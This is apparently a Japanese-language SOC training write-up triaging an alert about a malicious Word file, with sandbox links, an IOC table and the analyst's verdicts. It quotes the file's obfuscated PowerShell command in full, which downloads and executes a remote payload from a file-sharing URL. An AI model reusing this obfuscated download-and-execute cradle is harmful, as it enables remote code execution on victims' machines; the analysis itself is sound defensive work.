VirusTotal: https://www.virustotal.com/gui/file/08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873
wordを開くと、コマンドを実行
> powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
AnyRun: https://app.any.run/tasks/56f42e2a-78ae-4a46-85b6-99abb8fb4f7d
filetransfer.io(104.21.13.139)
VirusTotal: https://www.virustotal.com/gui/domain/filetransfer.io
urlscan.io: https://urlscan.io/result/26e167cf-49f3-474f-bfbe-8debddec4d98/
怪しい判定もあるがファイル送信サービスであるので仕方がなさそうだ。悪いファイルの送信にも使われるのだろう。
今回のwordがダウンロードしてくるファイルは、すでに削除されているようで確認できなかった。
Answer: Malicious
Check If Someone Requested the C2
そもそも今回の場合、
Device Action Blocked
であるからalertに関しては
Answer: Not-Accessed
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| f2d0c66b801244c059f636d08a474079 | MD5 Hash | malicious word file |
| https[:]//filetransfer[.]io/data-package/UR2whuBv/download | URL Address | file sending service |
End
今回のalertに関しては問題無さそうだが、historyを見ると何か問題がありそうなので実際にはここから別の調査が必要になりそうだ。
